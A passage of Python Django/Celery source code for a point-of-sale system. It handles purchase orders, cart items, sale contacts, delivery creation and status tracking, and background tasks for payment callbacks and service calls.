payload['reference']\n\t\t\t\telif 'institution_id' in payload.keys():\n\t\t\t\t\tinstitution = Institution.objects.get(id=payload['institution_id'])\n\t\t\t\t\treference = reference(institution.business_number)\n\t\t\t\telse:\n\t\t\t\t\treference = reference(gateway_profile.gateway.name)\n\n\t\t\t\tif 'expiry' in payload.keys():\n\t\t\t\t\texpiry = datetime.strptime(payload['expiry'], '%Y-%m-%d')\n\t\t\t\telif 'expiry_years_period' in payload.keys():\n\t\t\t\t\texpiry = timezone.now()+timezone.timedelta(days=(365*int(payload['expiry_years_period'])))\n\t\t\t\telif 'expiry_days_period' in payload.keys():\n\t\t\t\t\texpiry = timezone.now()+timezone.timedelta(days=(int(payload['expiry_days_period'])))\n\t\t\t\telif 'expiry_hours_period' in payload.keys():\n\t\t\t\t\texpiry = timezone.now()+timezone.timedelta(hours=(int(payload['expiry_hours_period'])))\n\t\t\t\telif 'expiry_minutes_period' in payload.keys():\n\t\t\t\t\texpiry = timezone.now()+timezone.timedelta(minutes=(int(payload['expiry_minutes_period'])))\n\t\t\t\telif 'expiry_seconds_period' in payload.keys():\n\t\t\t\t\texpiry = timezone.now()+timezone.timedelta(seconds=(int(payload['expiry_seconds_period'])))\n\t\t\t\telse:\n\t\t\t\t\texpiry = timezone.localtime(timezone.now())+timezone.timedelta(days=45)\n\n\t\t\t\tstatus = OrderStatus.objects.get(name='UNPAID')\n\t\t\t\tcurrency = cart_items[0].currency\n\n\t\t\t\tpurchase_order = PurchaseOrder(reference=reference,\\\n\t\t\t\t\t\tcurrency=currency,\\\n\t\t\t\t\t\tstatus=status,expiry=expiry, gateway_profile=session_gateway_profile)\n\n\t\t\t\tif 'description' in payload.keys():\n\t\t\t\t\tpurchase_order.description = payload['description']\n\t\t\t\telif 'description' not in payload.keys() and 'comment' in payload.keys():\n\t\t\t\t\tpurchase_order.description = payload['comment']\n\t\t\n\t\t\t\tpurchase_order.save()\t\n\n\t\t\t\tbalance_bf = Decimal(0)\n\t\t\t\tfor item in cart_items:\n\t\t\t\t\tbalance_bf = self.get_balance_bf(item, purchase_order, balance_bf)\n\t\t\t\t\t#Primary Item Bill Entry\n\t\t\t\t\tbill_manager = self.bill_entry(item, purchase_order, balance_bf, payload)\n\n\t\t\t\t\tbalance_bf = self.sale_charge_bill_entry(balance_bf, item, payload, purchase_order, gateway_profile.gateway)\n\n\t\t\t\tpayload['reference'] = purchase_order.reference\n\t\t\t\tpayload['purchase_order_id'] = purchase_order.id\n\n\t\t\t\tpayload[\"response_status\"] = \"00\"\n\t\t\t\tpayload[\"response\"] = \"Purchase Order Created\"\n\t\texcept Exception as e:\n\t\t\tpayload['response'] = str(e)\n\t\t\tpayload['response_status'] = '96'\n\t\t\tlgr.info(\"Error on creating purchase order: %s\" % e,exc_info=True)\n\t\treturn payload\n\n\tdef add_product_to_cart(self, payload, node_info):\n\t\ttry:\n\n\t\t\tproduct_item = ProductItem.objects.get(id=payload['product_item_id'])\n\t\t\tgateway_profile = GatewayProfile.objects.get(id=payload['gateway_profile_id'])\n\n\n\n\n\t\t\tquantity = Decimal(payload['quantity']) if 'quantity' in payload.keys() and payload['quantity'] not in [\"\",None] else Decimal(1)\n\t\t\tsub_total = Decimal(product_item.unit_cost*quantity).quantize(Decimal('.01'), rounding=ROUND_DOWN)\n\t\t\ttotal = sub_total\n\n\t\t\tif 'quantity' not in payload.keys() and product_item.variable_unit and 'amount' in payload.keys():\n\t\t\t\tquantity = Decimal(Decimal(payload['amount'])/product_item.unit_cost).quantize(Decimal('.01'), rounding=ROUND_DOWN)\n\t\t\t\tsub_total = Decimal(product_item.unit_cost*quantity).quantize(Decimal('.01'), rounding=ROUND_DOWN)\n\t\t\t\ttotal = sub_total\n\n\n\t\t\tprimary_item = self.cart_entry(product_item, payload, quantity, sub_total, total)\n\n\t\t\tpayload['cart_items'] = '%s%s' % (primary_item.id, ','+payload['cart_items'] if 'cart_items' in payload.keys() else '')\n\n\t\t\tsale_charge_item = self.sale_charge_item(total, primary_item, payload, gateway_profile.gateway)\n\t\t\tif sale_charge_item:\n\t\t\t\tpayload['cart_items'] = '%s%s' % (sale_charge_item.id, ','+payload['cart_items'] if 'cart_items' in payload.keys() else '')\n\n\t\t\tpayload[\"response_status\"] = \"00\"\n\t\t\tpayload[\"response\"] = \"Product Added to Cart\"\n\t\texcept Exception as e:\n\t\t\tpayload['response'] = str(e)\n\t\t\tpayload['response_status'] = '96'\n\t\t\tlgr.info(\"Error on Adding product to cart: %s\" % e,exc_info=True)\n\t\treturn payload\n\n\tdef cancel_sale_order(self, payload, node_info):\n\t\ttry:\n\n\t\t\treference = payload['reference'].strip() if 'reference' in payload.keys() else \"\"\n\t\t\tpurchase_order = PurchaseOrder.objects.filter(reference=reference, status__name='UNPAID')\n\n\t\t\tif 'purchase_order_id' in payload.keys():\n\t\t\t\tpurchase_order = purchase_order.filter(id=payload['purchase_order_id'])\n\n\t\t\tif purchase_order.exists():\n\t\t\t\tpurchase_order.update(status=OrderStatus.objects.get(name='CANCELLED'))\n\t\t\t\tfor c in purchase_order:\n\t\t\t\t\tc.update(status=CartStatus.objects.get(name='CANCELLED'))\n\n\t\t\t\tpayload['response'] = 'Sale Order Cancelled'\n\t\t\t\tpayload['response_status'] = '00'\n\t\t\telse:\n\t\t\t\tpayload['response_status'] = '25'\n\t\texcept Exception as e:\n\t\t\tpayload['response_status'] = '96'\n\t\t\tlgr.info(\"Error on Reversing Sale Order: %s\" % e)\n\t\treturn payload\n\n\n\tdef add_to_order(self, payload, node_info):\n\t\ttry:\n\t\t\tpayload = self.add_product_to_cart(payload, node_info)\n\t\t\tif 'response_status' in payload.keys() and payload['response_status'] == '00':\n\t\t\t\tpayload = self.add_to_purchase_order(payload, node_info)\n\t\t\t\tif 'response_status' in payload.keys() and payload['response_status'] == '00':\n\t\t\t\t\tpayload[\"response_status\"] = \"00\"\n\t\t\t\t\tif 'reference' in payload.keys():\n\t\t\t\t\t\tpayload[\"response\"] = payload['reference']\n\t\t\t\t\telse:\n\t\t\t\t\t\tpayload[\"response\"] = \"Sale Order\"\n\n\t\texcept Exception as e:\n\t\t\tpayload['response_status'] = '96'\n\t\t\tlgr.info(\"Error on Creating Sale Order: %s\" % e)\n\t\treturn payload\n\n\n\n\tdef bulk_sale_order(self, payload, node_info):\n\t\ttry:\n\t\t\tproduct_item_list = payload['product_item_list']\n\t\t\tpurchase_order_id = None\n\t\t\tfor i in product_item_list:\n\t\t\t\tpayload = self.add_product_to_cart(i, node_info)\n\t\t\t\tif 'response_status' in payload.keys() and payload['response_status'] == '00':\n\t\t\t\t\tif purchase_order_id:\n\t\t\t\t\t\tpayload['purchase_order_id'] = purchase_order_id\n\t\t\t\t\t\tpayload = self.add_to_purchase_order(payload, node_info)\n\n\t\t\t\t\telse:\n\t\t\t\t\t\tpayload = self.create_purchase_order(payload, node_info)\n\t\t\t\t\t\tpurchase_order_id = payload['purchase_order_id']\n\n\t\t\t\t\tif 'response_status' in payload.keys() and payload['response_status'] == '00':\n\t\t\t\t\t\tpayload[\"response_status\"] = \"00\"\n\t\t\t\t\t\tif 'reference' in payload.keys():\n\t\t\t\t\t\t\tpayload[\"response\"] = payload['reference']\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tpayload[\"response\"] = \"Sale Order\"\n\t\t\t\telse:\n\t\t\t\t\tbreak\n\n\t\texcept Exception as e:\n\t\t\tpayload['response'] = str(e)\n\t\t\tpayload['response_status'] = '96'\n\t\t\tlgr.info(\"Error on Creating Sale Order: %s\" % e)\n\t\treturn payload\n\n\n\tdef sale_order(self, payload, node_info):\n\t\ttry:\n\t\t\tpayload = self.add_product_to_cart(payload, node_info)\n\t\t\tif 'response_status' in payload.keys() and payload['response_status'] == '00':\n\t\t\t\tpayload = self.create_purchase_order(payload, node_info)\n\t\t\t\tif 'response_status' in payload.keys() and payload['response_status'] == '00':\n\t\t\t\t\tpayload[\"response_status\"] = \"00\"\n\t\t\t\t\tif 'reference' in payload.keys():\n\t\t\t\t\t\tpayload[\"response\"] = payload['reference']\n\t\t\t\t\telse:\n\t\t\t\t\t\tpayload[\"response\"] = \"Sale Order\"\n\n\t\texcept Exception as e:\n\t\t\tpayload['response_status'] = '96'\n\t\t\tlgr.info(\"Error on Creating Sale Order: %s\" % e)\n\t\treturn payload\n\n\n\tdef create_sale_contact(self, payload, node_info):\n\t\ttry:\n\t\t\tgateway_profile = GatewayProfile.objects.get(id=payload['gateway_profile_id'])\n\t\t\tsale_contact_type = SaleContactType.objects.get(id=payload[\"sale_contact_type\"])\n\n\n\t\t\t#transaction_reference = payload['bridge__transaction_id'] if 'bridge__transaction_id' in payload.keys() else None\n\t\t\ttransaction = Transaction.objects.get(id=payload[\"bridge__transaction_id\"])\n\n\t\t\tprimary_contact_profile = Profile.objects.get(id=payload['profile_id'])\n\t\t\tlgr.info(\"Starting Generating Till Number\")\n\t\t\tall_contacts = SaleContact.objects.filter(institution=gateway_profile.institution).order_by(\"-sale_contact_number\")[:1]\n\t\t\tif len(all_contacts)>0:\n\t\t\t\tsale_contact_number = all_contacts[0].sale_contact_number+1\n\t\t\telse:\n\t\t\t\tsale_contact_number = 1\n\n\t\t\ttry:details = json.loads(transaction.request)\n\t\t\texcept: details = json.loads({})\n\n\t\t\tif \"sale_contact_name\" in details.keys(): del details[\"sale_contact_name\"]\n\t\t\tif \"sale_contact_type\" in details.keys(): del details[\"sale_contact_type\"]\n\t\t\tif \"comment\" in details.keys(): del details[\"comment\"]\n\n\t\t\tsale_contact = SaleContact(name=payload['sale_contact_name'],description=payload['sale_contact_name'],\\\n\t\t\t\t\tsale_contact_type=sale_contact_type,geometry=transaction.geometry,\\\n\t\t\t\t\tsale_contact_number=sale_contact_number,institution=gateway_profile.institution,\\\n\t\t\t\t\tprimary_contact_profile=primary_contact_profile,details=details,created_by=gateway_profile)\n\n\t\t\tif 'sale_contact_location' in payload.keys():\n\t\t\t\tsale_contact.location=payload['sale_contact_location'],\n\t\t\tif \"comment\" in payload.keys():\n\t\t\t\tsale_contact.comment = payload[\"comment\"]\n\t\t\tsale_contact.save()\n\n\t\t\tpayload['sale_contact_id'] = sale_contact.id\n\t\t\tpayload['sale_contact_number'] = sale_contact.sale_contact_number\n\n\t\t\tpayload[\"response_status\"] = \"00\"\n\t\t\tpayload[\"response\"] = \"Sale Contact Created\"\n\t\texcept Exception as e:\n\t\t\tpayload['response_status'] = '96'\n\t\t\tlgr.info(\"Error on Creating Sale Contact: %s\" % e)\n\t\treturn payload\n\n\tdef delivery_notification(self, payload, node_info):\n\t\t'''\n\t\tadd model pos.DeliveryContact\n\t\t\tprofile (upc.Profile)\n\t\t\tinstitution (upc.Institution)\n\t\t\tstatus AVAILABLE DELIVERING\n\t\tadd model pos.DeliveryActivity\n\t\t\tdelivery (pos.Delivery)\n\t\t\tcontact (pos.DeliveryContact)\n\t\t\tstatus NOTIFIED ACCEPTED REJECTED\n\t\t'''\n\t\ttry:\n\t\t\tgateway_profile = GatewayProfile.objects.get(id=payload['gateway_profile_id'])\n\n\t\t\ttry:\n\t\t\t\tdelivery_contact = DeliveryContact.objects.get(gateway_profile = gateway_profile)\n\t\t\texcept:\n\t\t\t\tdelivery_contact = DeliveryContact()\n\t\t\t\tdelivery_contact.gateway_profile = gateway_profile\n\t\t\t\tdelivery_contact.save()\n\n\t\t\tdelivery_activity = DeliveryActivity()\n\t\t\tdelivery_activity.delivery_id = payload['delivery']\n\t\t\tdelivery_activity.contact = delivery_contact\n\t\t\tdelivery_activity.status = DeliveryActivityStatus.objects.get(name='NOTIFIED')\n\t\t\tdelivery_activity.save()\n\n\t\t\t# TODO : send delivery notification\n\n\n\t\t\tpayload[\"response_status\"] = \"00\"\n\t\t\tpayload[\"response\"] = \"Sale Contact Created\"\n\t\texcept Exception as e:\n\t\t\tpayload['response_status'] = '96'\n\t\t\tlgr.info(\"Error on Creating Sale Contact: %s\" % e)\n\n\t\treturn payload\n\n\tdef create_delivery(self, payload, node_info):\n\t\ttry:\n\t\t\tgateway_profile = GatewayProfile.objects.get(id=payload['gateway_profile_id'])\n\t\t\tpurchase_order = PurchaseOrder.objects.get(id=payload['purchase_order_id'])\n\n\t\t\tif 'delivery_location_coord' not in payload.keys() and 'delivery_location_name' not in payload.keys():\n\t\t\t\tpayload[\"response_status\"] = \"00\"\n\t\t\t\tpayload[\"response\"] = \"Delivery Not Created, No Location Specified\"\n\t\t\t\treturn payload\n\n\t\t\t# delivery_types = DeliveryType.objects.filter(institution=institution)\n\t\t\t# if delivery_types.exists():\n\t\t\tdeliveries = Delivery.objects.filter(order=purchase_order)\n\t\t\tif not deliveries.exists():\n\t\t\t\tdelivery = Delivery()\n\t\t\t\tdelivery.order_id = payload['purchase_order_id']\n\t\t\t\tdelivery.status = DeliveryStatus.objects.get(name='CREATED')\n\t\t\t\t# TODO\n\n\t\t\t\ttry:\n\t\t\t\t\tdate_string = payload['scheduled_date'] + ' ' + payload['scheduled_time']\n\t\t\t\t\tdate_obj = datetime.strptime(date_string, '%d/%m/%Y %I:%M %p')\n\t\t\t\t\tscheduled_send = pytz.timezone(gateway_profile.user.profile.timezone).localize(date_obj)\n\t\t\t\t\tdelivery.schedule = scheduled_send\n\n\t\t\t\texcept:pass\n\t\t\t\tlgr.info(\"Delivery schedule : {}\".format(delivery.schedule))\n\n\t\t\t\tif 'delivery_location_coord' in payload.keys():\n\t\t\t\t\tcoordinates = payload['delivery_location_coord']\n\t\t\t\t\tlongitude, latitude = coordinates.split(',', 1)\n\t\t\t\t\ttrans_point = Point(float(longitude), float(latitude))\n\t\t\t\t\tdelivery.destination_coord = trans_point\n\t\t\t\tif 'delivery_location_name' in payload.keys():\n\t\t\t\t\tdelivery.destination_name = payload['delivery_location_name']\n\n\n\t\t\t\tdelivery.save()\n\n\t\t\t\tpayload[\"delivery_id\"] = delivery.pk\n\n\t\t\tpayload[\"response_status\"] = \"00\"\n\t\t\tpayload[\"response\"] = \"Delivery Created\"\n\t\texcept Exception as e:\n\t\t\tpayload['response_status'] = '96'\n\t\t\tlgr.info(\"Error on Creating Delivery: %s\" % e)\n\n\t\treturn payload\n\n\n\tdef create_delivery_type(self, payload, node_info):\n\t\ttry:\n\t\t\tgateway_profile = GatewayProfile.objects.get(id=payload['gateway_profile_id'])\n\t\t\tinstitution = gateway_profile.institution\n\t\t\tchannel = Channel.objects.get(name=payload['channel'])\n\n\t\t\tdelivery_types = DeliveryType.objects.filter(institution=institution,channel=channel,gateway=gateway_profile.gateway)\n\t\t\tif delivery_types.exists():\n\t\t\t\tpass\n\t\t\telse:\n\t\t\t\tdelivery_type = DeliveryType()\n\t\t\t\tdelivery_type.channel = channel\n\t\t\t\tdelivery_type.institution = institution\n\t\t\t\tdelivery_type.status = DeliveryTypeStatus.objects.get(name='ACTIVE')\n\t\t\t\tdelivery_type.gateway = gateway_profile.gateway\n\t\t\t\tdelivery_type.save()\n\t\t\t\tpayload[\"delivery_id\"] = delivery_type.pk\n\n\t\t\tpayload[\"response_status\"] = \"00\"\n\t\t\tpayload[\"response\"] = \"Delivery Type Created\"\n\t\texcept Exception as e:\n\t\t\tpayload['response_status'] = '96'\n\t\t\tlgr.info(\"Error on Creating Delivery Type: %s\" % e)\n\n\t\treturn payload\n\n\n\tdef assign_order(self, payload, node_info):\n\t\ttry:\n\t\t\tdelivery = Delivery.objects.get(pk=payload['delivery_id'])\n\t\t\tdelivery_profile = GatewayProfile.objects.get(id=payload['session_gateway_profile_id'])\n\n\t\t\tdelivery.delivery_profile = delivery_profile\n\t\t\tdelivery.status = DeliveryStatus.objects.get(name='ASSIGNED')\n\t\t\tdelivery.save()\n\n\t\t\t# used for sending notifications\n\t\t\tpayload['msisdn'] = delivery_profile.msisdn.phone_number\n\n\t\t\tpayload[\"response_status\"] = \"00\"\n\t\t\tpayload[\"response\"] = \"Delivery Assigned\"\n\t\texcept Exception as e:\n\t\t\tpayload['response_status'] = '96'\n\t\t\tlgr.info(\"Error on Assigning Delivery: %s\" % e)\n\n\t\treturn payload\n\n\tdef order_has_delivery(self, payload, node_info):\n\t\t'''\n\t\tAdds a trigger `has_delivery` if the purchaser_order has a Delivery\n\t\t'''\n\t\ttry:\n\t\t\tdeliveries = Delivery.objects.filter(order_id=payload['purchase_order_id'])\n\t\t\tif deliveries.exists():\n\t\t\t\tpayload['delivery_id'] = deliveries[0].pk\n\t\t\t\tpayload['trigger'] = 'has_delivery%s' % (',' + payload['trigger'] if 'trigger' in payload.keys() else '')\n\t\t\telse:\n\t\t\t\tpayload['trigger'] = 'no_delivery%s' % (\n\t\t\t\t\t',' + payload['trigger'] if 'trigger' in payload.keys() else '')\n\n\t\t\tpayload['response_status'] = '00'\n\t\t\tpayload['response'] = 'Checked Delivery'\n\t\texcept Exception as e:\n\t\t\tpayload['response_status'] = '96'\n\t\t\tlgr.info(\"Error on Checking Delivery: %s\" % e)\n\t\treturn payload\n\n\n\tdef order_status(self, payload, node_info):\n\t\ttry:\n\t\t\tgateway_profile = GatewayProfile.objects.get(id=payload['gateway_profile_id'])\n\t\t\tif 'delivery_id' in payload.keys():\n\t\t\t\tdelivery = Delivery.objects.get(id=payload['delivery_id'])\n\t\t\telif 'purchase_order_id' in payload.keys():\n\t\t\t\tpurchase_order = PurchaseOrder.objects.get(id=payload['purchase_order_id'])\n\t\t\t\tdelivery = Delivery.objects.filter(order=purchase_order).first()\n\t\t\t# delivery = Delivery.objects.get(id=payload['delivery_id'])\n\n\t\t\tpurchase_order = delivery.order\n\t\t\tpayload['purchase_order_id'] = purchase_order.pk\n\t\t\tif gateway_profile.access_level == AccessLevel.objects.get(name='DELIVERY'):\n\t\t\t\t# accepted_by_me\n\t\t\t\tif delivery.delivery_profile == gateway_profile:\n\t\t\t\t\tif delivery.status.name == 'IN PROGRESS':\n\t\t\t\t\t\tpayload['trigger'] = 'accepted_by_me%s' % (','+payload['trigger'] if 'trigger' in payload.keys() else '')\n\t\t\t\t\telif delivery.status.name == 'ASSIGNED':\n\t\t\t\t\t\tpayload['trigger'] = 'accepted_by_none%s' % (',' + payload['trigger'] if 'trigger' in payload.keys() else '')\n\t\t\telse:\n\t\t\t\tif delivery.status.name =='WAITTING CONFIRMATION':\n\t\t\t\t\tpayload['trigger'] = 'should_confirm%s' % (',' + payload['trigger'] if 'trigger' in payload.keys() else '')\n\n\t\t\tpayload['delivery_status'] = delivery.status.name\n\t\t\tpayload[\"response_status\"] = \"00\"\n\t\t\tpayload[\"response\"] = \"Got Purchase Order Details\"\n\t\texcept Exception as e:\n\t\t\tpayload['response_status'] = '96'\n\t\t\tlgr.info(\"Error on getting Purchase Order Details: %s\" % e)\n\n\t\treturn payload\n\n\n\tdef accept_order(self, payload, node_info):\n\t\ttry:\n\t\t\tgateway_profile = GatewayProfile.objects.get(id=payload['gateway_profile_id'])\n\t\t\tdelivery = Delivery.objects.get(id=payload['delivery_id'])\n\n\t\t\tpurchase_order = delivery.order\n\t\t\tpayload['purchase_order_id'] = purchase_order.pk\n\n\t\t\t#coordinates = payload['delivery_origin']\n\t\t\t#longitude, latitude = coordinates.split(',', 1)\n\t\t\t#trans_point = Point(float(longitude), float(latitude))\n\t\t\t#delivery.origin_name = coordinates\n\t\t\t#delivery.origin_coord = trans_point\n\t\t\tdelivery.status = DeliveryStatus.objects.get(name='IN PROGRESS')\n\t\t\tdelivery.save()\n\n\n\t\t\tpayload[\"response_status\"] = \"00\"\n\t\t\tpayload[\"response\"] = \"Delivery Accepted Accepted\"\n\t\texcept Exception as e:\n\t\t\tpayload['response_status'] = '96'\n\t\t\tlgr.info(\"Error on accepting Delivery: %s\" % e)\n\n\t\treturn payload\n\n\tdef delivery_done(self, payload, node_info):\n\t\ttry:\n\t\t\tgateway_profile = GatewayProfile.objects.get(id=payload['gateway_profile_id'])\n\t\t\tdelivery = Delivery.objects.get(id=payload['delivery_id'])\n\n\t\t\tdelivery.status = DeliveryStatus.objects.get(name='WAITTING CONFIRMATION')\n\t\t\tdelivery.save()\n\n\t\t\tpayload[\"response_status\"] = \"00\"\n\t\t\tpayload[\"response\"] = \"Delivery DELIVERED\"\n\t\texcept Exception as e:\n\t\t\tpayload['response_status'] = '96'\n\t\t\tlgr.info(\"Error on Completing Delivery: %s\" % e)\n\n\t\treturn payload\n\n\tdef delivery_details(self, payload, node_info):\n\t\ttry:\n\t\t\tgateway_profile = GatewayProfile.objects.get(id=payload['gateway_profile_id'])\n\t\t\tif 'delivery_id' in payload.keys():\n\t\t\t\tdelivery = Delivery.objects.get(id=payload['delivery_id'])\n\n\t\t\telif 'purchase_order_id' in payload.keys():\n\t\t\t\tpurchase_order = PurchaseOrder.objects.get(id=payload['purchase_order_id'])\n\t\t\t\tdelivery = Delivery.objects.filter(order=purchase_order).first()\n\n\t\t\tpurchase_order = delivery.order\n\t\t\tpayload['purchase_order_id'] = purchase_order.pk\n\t\t\tpayload['delivery_status'] = delivery.status.name\n\n\t\t\tif delivery.delivery_profile:\n\t\t\t\tif delivery.delivery_profile.msisdn: payload['delivery_profile_phone'] = delivery.delivery_profile.msisdn.phone_number\n\t\t\t\tdelivery_user = delivery.delivery_profile.user\n\t\t\t\tpayload['delivery_profile_name'] = delivery_user.first_name +' '+delivery_user.last_name\n\n\t\t\tpayload['delivery_origin_name'] = delivery.origin_name\n\t\t\tif delivery.origin_coord:\n\t\t\t\tpayload['delivery_origin_coord'] = '{},{}'.format(delivery.origin_coord.x,delivery.origin_coord.y)\n\t\t\tpayload['delivery_destination_name'] = delivery.destination_name\n\t\t\tif delivery.destination_coord:\n\t\t\t\tpayload['delivery_destination_coord'] = '{},{}'.format(delivery.destination_coord.x, delivery.destination_coord.y)\n\n\t\t\tdelivery_recipient = purchase_order.gateway_profile\n\t\t\tpayload['delivery_recipient_name'] = delivery_recipient.user.first_name+' '+delivery_recipient.user.last_name\n\t\t\tif delivery_recipient.msisdn:payload['delivery_recipient_phone'] = delivery_recipient.msisdn.phone_number\n\n\t\t\tpayload['delivery_schedule'] = delivery.schedule\n\n\t\t\tpayload[\"response_status\"] = \"00\"\n\t\t\tpayload[\"response\"] = \"Got Delivery Details\"\n\t\texcept Exception as e:\n\t\t\tpayload['response_status'] = '96'\n\t\t\tlgr.info(\"Error Getting Delivery Details: %s\" % e)\n\t\treturn payload\n\t\n\tdef delivery_confirm(self, payload, node_info):\n\t\ttry:\n\t\t\tgateway_profile = GatewayProfile.objects.get(id=payload['gateway_profile_id'])\n\n\t\t\t#purchase_order = PurchaseOrder.objects.get()\n\t\t\tdelivery = Delivery.objects.get(id=payload['delivery_id'])\n\n\t\t\tdelivery.status = DeliveryStatus.objects.get(name='DELIVERED')\n\t\t\tdelivery.save()\n\n\t\t\tpayload[\"response_status\"] = \"00\"\n\t\t\tpayload[\"response\"] = \"Delivery Activity confirmed\"\n\t\texcept Exception as e:\n\t\t\tpayload['response_status'] = '96'\n\t\t\tlgr.info(\"Error on Confirming Delivery Activity: %s\" % e)\n\n\t\treturn payload\n\n\n\n\nclass Trade(System):\n\tpass\n\n\nclass Payments(System):\n\tpass\n\n\n\n@app.task(ignore_result=True)\ndef callback_url_call(bill, cart):\n\tlgr = get_task_logger(__name__)\n\ttry:\n\t\tbill_manager = BillManager.objects.get(id=bill)\n\t\tcart_item = CartItem.objects.get(id=cart)\n\n\t\tpayload = json.loads(cart_item.details)\n\n\t\tpayload.update(json.loads(bill_manager.incoming_payment.request))\n\t\tpayload['quantity'] = cart_item.quantity\n\t\tpayload['currency'] = cart_item.currency.code\n\t\tpayload['amount'] = cart_item.total\n\n\t\tpayload = dict(map(lambda x:(str(x[0]).lower(),json.dumps(x[1]) if isinstance(x[1], dict) else str(x[1])), payload.items()))\n\n\t\tAPI_KEY = cart_item.api_gateway_profile.user.profile.api_key\n\t\tpayload = Authorize().return_hash(payload, API_KEY)\n\t\tnode = cart_item.api_callback_url\n\n\t\tlgr.info(\"Payload: %s| Node: %s\" % (payload, node) )\n\n\t\tpayload = WebService().post_request(payload, node)\n\n\t\tlgr.info('CallBack Response: %s' % payload)\n\t\tif 'response' in payload.keys(): cart_item.api_message = payload['response'][:128]\n\t\tif 'response_status' in payload.keys() and payload['response_status'] == '00':\n\t\t\tcart_item.api_callback_status = APICallBackStatus.objects.get(name='SENT')\n\t\telse:\n\t\t\tcart_item.api_callback_status = APICallBackStatus.objects.get(name='FAILED')\n\n\t\tcart_item.save()\n\n\texcept Exception as e:\n\t\tlgr.info('Error on CallBack URL Call: %s' % e)\n\n\n@app.task(ignore_result=True)\n@transaction.atomic\ndef settle_orders(order_list):\n\tfor o in order_list:\n\t\torder = PurchaseOrder.objects.get(id=o)\n\t\torder.status = OrderStatus.objects.get(name='SETTLED')\n\t\torder.cart_processed = False\n\t\torder.save()\n\n\t\torder.cart_item.update(status=CartStatus.objects.get(name='SETTLED'))\n\n\n@app.task(ignore_result=True)\ndef order_background_service_call(order, status):\n\tlgr = get_task_logger(__name__)\n\ttry:\n\t\tfrom primary.core.bridge.tasks import Wrappers as BridgeWrappers\n\t\t#o = PurchaseOrder.objects.get(id=order)\n\t\tlgr.info('Started Order Service Call: %s' % order)\n\t\tbill = BillManager.objects.filter(order__id=order).last()\n\t\to = bill.order\n\t\tlgr.info('Captured Order: %s' % o)\n\t\tcart_item = o.cart_item.filter(Q(status__name=status), ~Q(Q(product_item__product_type__service=None),Q(product_item__product_type__settlement_service=None)))\n\t\tlgr.info('Cart Item: %s' % cart_item)\n\t\tfor c in cart_item:\n\t\t\tlgr.info('Captured Cart Item: %s | %s | %s' % (c,c.product_item.product_type.service, c.product_item.product_type.settlement_service))\n\t\t\tproduct_item = c.product_item\n\t\t\tpayload = json.loads(c.details)\t\n\n\t\t\tgateway_profile = c.gateway_profile\n\t\t\tservice = product_item.product_type.settlement_service if status == 'SETTLED' else product_item.product_type.service \n\n\t\t\tpayload['cart_item_id'] = c.id\n\t\t\tpayload['purchase_order_id'] = o.id\n\t\t\tpayload['product_item_id'] = c.product_item.id\n\t\t\tpayload['item'] = c.product_item.name\n\t\t\tpayload['product_type'] = c.product_item.product_type.name\n\t\t\tpayload['quantity'] = c.quantity\n\t\t\tpayload['currency'] = c.currency.code\n\t\t\tpayload['amount'] = c.total\n\t\t\tpayload['reference'] = o.reference\n\t\t\tpayload['institution_id'] = c.product_item.institution.id\n\t\t\tpayload['chid'] = c.channel.id\n\t\t\tpayload['ip_address'] = '127.0.0.1'\n\t\t\tpayload['gateway_host'] = '127.0.0.1'\n\n\n\t\t\tif bill.incoming_payment:\n\t\t\t\tpayload['paygate_incoming_id'] = bill.incoming_payment.id\n\t\t\t\tpayload['ext_inbound_id'] = bill.incoming_payment.ext_inbound_id\n\t\t\t\tpayload.update(bill.incoming_payment.request)\n\n\t\t\tpayload = dict(map(lambda x:(str(x[0]).lower(),json.dumps(x[1]) if isinstance(x[1], dict) else str(x[1])), payload.items()))\n\n\t\t\tpayload = BridgeWrappers().background_service_call(service, gateway_profile, payload)\n\n\t\t\tlgr.info('\\n\\n\\n\\n\\t########\\tResponse: %s\\n\\n' % payload)\n\texcept Exception as e:\n\t\tpayload['response_status'] = '96'\n\t\tlgr.info('Unable to make service call: %s' % e)\n\treturn payload\n\n@app.task(ignore_result=True)\ndef order_service_call(order):\n\tlgr = get_task_logger(__name__)\n\tfrom primary.core.api.views import ServiceCall\n\ttry:\n\t\tlgr.info('OrderID: %s' % order)\n\t\to = PurchaseOrder.objects.get(id=order)\n\t\tlgr.info('Captured Order: %s' % o)\n\t\tcart_item = o.cart_item.all()\n\t\tfor c in cart_item:\n\t\t\tlgr.info('Captured Cart Item: %s | %s' % (c,c.product_item.product_type.service))\n\t\t\tproduct_item = c.product_item\n\t\t\tpayload = json.loads(c.details)\t\n\n\t\t\tgateway_profile = c.gateway_profile\n\t\t\tservice = c.product_item.product_type.service\n\n\t\t\tpayload['cart_item_id'] = c.id\n\t\t\tpayload['purchase_order_id'] = o.id\n\t\t\tpayload['product_item_id'] = c.product_item.id\n\t\t\tpayload['item'] = c.product_item.name\n\t\t\tpayload['product_type'] = c.product_item.product_type.name\n\t\t\tpayload['quantity'] = c.quantity\n\t\t\tpayload['currency'] = c.currency.code\n\t\t\tpayload['amount'] = c.total\n\t\t\tpayload['reference'] = o.reference\n\t\t\t#payload['institution_id'] = c.product_item.institution.id\n\t\t\tpayload['chid'] = c.channel.id\n\t\t\tpayload['ip_address'] = '127.0.0.1'\n\t\t\tpayload['gateway_host'] = '127.0.0.1'\n\n\t\t\tpayload = dict(map(lambda x:(str(x[0]).lower(),json.dumps(x[1]) if isinstance(x[1], dict) else str(x[1])), payload.items()))\n\n\t\t\tpayload = ServiceCall().api_service_call(service, gateway_profile, payload)\n\t\t\tlgr.info('\\n\\n\\n\\n\\t########\\tResponse: %s\\n\\n' % payload)\n\texcept Exception as e:\n\t\tpayload['response_status'] = '96'\n\t\tlgr.info('Unable to make service call: %s' % e)\n\treturn payload\n\n\n\n@app.task(ignore_result=True)\ndef service_call(payload):\n\tlgr = get_task_logger(__name__)\n\tfrom primary.core.api.views import ServiceCall\n\ttry:\n\t\tpayload = json.loads(payload)\n\n\t\tpayload = dict(map(lambda x:(str(x[0]).lower(),json.dumps(x[1]) if isinstance(x[1], dict) else str(x[1])), payload.items()))\n\t\tservice = Service.objects.get(id=payload['service_id'])\n\t\tgateway_profile = GatewayProfile.objects.get(id=payload['gateway_profile_id'])\n\t\tpayload = ServiceCall().api_service_call(service, gateway_profile, payload)\n\t\tlgr.info('\\n\\n\\n\\n\\t########\\tResponse: %s\\n\\n' % payload)\n\texcept Exception as e:\n\t\tpayload['response_status'] = '96'\n\t\tlgr.info('Unable to make service call: %s' % e)\n\treturn payload\n\n\n@app.task(ignore_result=True) #Ignore results 